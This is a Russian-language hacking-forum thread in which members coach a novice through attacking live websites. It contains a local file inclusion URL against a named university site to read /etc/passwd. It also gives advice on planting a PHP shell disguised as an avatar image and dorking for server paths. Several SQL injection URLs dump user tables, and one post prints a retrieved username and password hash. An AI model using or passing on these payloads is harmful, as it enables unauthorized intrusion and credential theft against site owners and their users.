точно, сорри, там фрейм был ... а на другом через серч форму сайт инклудился ясно, вобщем при реальном инклуде с шелл.txt должно работать все? А где их можно поискать и как? Слышал про то, что пассы иногда хранятся в etc/shadow , Но на практике такого не видел ...
оч редко быват, что есть права прочитать файлы из шадоу .. да и не обязательно в шадоу .. пути искать в ошибках, попробуй ввести заведомо ложный путь.. поищи в гугле "site:сайт.ком AND warning OR mysql OR include" итд ..
то есть? ну допустим возьмем инъекцию http://www.cs.rmit.edu.au/fedconf/index.html?page=../../../../../../../../../../../../../../../etc/passwd%00 что нам дают эти данные? что дальше? site:www.cs.rmit.edu.au AND warning OR mysql OR include а что в итоге мы ищем?
Что-что, если есть sql-inj на этом же сайте, то данная информация может нам помочь загрузить шелл через скулю, потому что других путей узнать реальный путь к серверу может и не быть. В этой же теме странички две-три назад Tigger приводил неплохой пример SQL-inj с использованием загрузки /etc/passwd, который был доведен до победного конца. Читай тему
поверь, я перечитываю по несколько раз просто реально не понимаю, что нам дает этот запрос в гугле ... что значит найти пути по ошибкам и где искать пассы админок ... сорри, говорю же, я нуб мб статейку какую-нибудь мне посоветуете прочитать? читал много, но они либо совсем поверхностные, либо совсем уж углубленные (не для новичка вобщем). а почему бы тогда не инклудить сразу шелл, зачем в картинку прятать? или ты имеешь ввиду залить картинку на тот сервак, который ломаем посредством админки?
ок, пошел читать просто не особо пока хотел вникать в sql-inj , хотел сначала с пхп inj разобраться полностью ... но чувствую придется
если инклуд локальный, и на сайте есть к примеру рега для юзеров и можно залить аватар или чтото типо того, то можно с картинкой залить шелл, ну а потом и использовать )) -- немного поиска по форуму) https://forum.antichat.ru/thread23501-php+%E8%ED%EA%EB%F3%E4.html
Подскажите, я несколько раз, ломая сайт через SQL-инъекцию, наталкивался на админку, авторизация в которой выглядит как системное сообщение (поверх окна, наверняка многие с этим сталкивались..) с полями Имя пользователя и Пароль. Почему то ни в одном случае не получалочь войти в админку, несмотря на то, что логин и пароль введены верно: после ввода появляется ошибка Authorization Required. Во всех остальных случаях авторизация проходит нормально, такая проблема только с подобным видом авторизации. Почему такое может происходить? Вход в админку возможен только с определенного IP? Или что то другое..?
То есть при уязвимости в SQL с такой авторизацией получается я никак пассы не достану..? :/ Странно, а зачем же тогда поле Passwd в таблице пользователей сайта.. и еще вопрос: нашел скулю вида: Code: http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),user(),database()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--%20%201 Хочу соответственно узнать логин и пасс юзеров, ввожу: Code: http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,username,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+c_users--%20%201 И мне видается ошибка Table 'siteru.c_users' doesn't exist То есть такой таблицы не существует? Но я же точно знаю, что она есть... и все названия таблиц и колонок правельные!
правильно ли я делаю? Ввел: Появилось, я так понимаю, это самое schema name, попробовал с этим названием: Все равно пишет, что Table 'worldsru.c_reg_users' doesn't exist Попробовал поперебирать через LIMIT - всего 2 имени - собственно само information_schema и это worldsru ((
Ты не указал, у какой таблицы хочешь узнать table_schema, чтобы узнать нужную, выполни запрос Code: http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,table_schema,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+information_schema.tables+where+table_name='c_reg_users'--%20%201
Thrasher88 Вот рабочий запрос: http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,username,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+aphorism.c_reg_users/* база: aphorism nazar:4afd521d77158e02aed37e2274b90c9c А вот все базы их там 10 шт: http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,schema_name,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+information_schema.schemata+limit+9,1/*
поищи ошибки .. понаставляй кавычки итд .. чтоб добиться ошибки, и может повезёт .. также гугл тебе в помощь .. ибо в его кеше, часто сохнаряются ..
